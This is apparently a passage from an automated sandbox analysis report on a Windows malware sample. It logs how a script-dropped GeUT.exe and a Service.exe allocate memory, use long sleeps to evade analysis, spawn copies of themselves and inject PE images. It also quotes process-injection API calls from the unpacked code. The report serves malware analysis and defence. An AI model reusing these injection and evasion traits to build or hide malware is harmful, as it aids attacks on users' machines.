              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 48A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: C10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 25A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 45A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 1230000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2EE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2E20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 1420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2F70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4F70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: C00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2980000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2790000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2FF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3170000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 5170000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1710000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3160000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2F40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2EB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2EB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 12F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2BD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: B90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 27D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2550000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 24F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2620000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4620000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2DC0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 3080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 5080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: CE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 28A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2650000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: EE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 1180000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 1650000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 3240000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 5240000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow / User API: threadDelayed 462Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow / User API: threadDelayed 9010Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1036Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704Thread sleep time: -339000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704Thread sleep time: -9010000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1020Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5708Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3704Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4544Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5664Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2612Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5144Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5588Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5192Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5808Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4232Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5764Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5684Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 992Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5156Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1408Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4600Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1924Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3384Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4856Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3000Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: GeUT.exe, 00000003.00000002.3408146583.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeFile created: GeUT.exe.0.drJump to dropped file
              Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
              Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 390000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 500000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 370000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 770000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
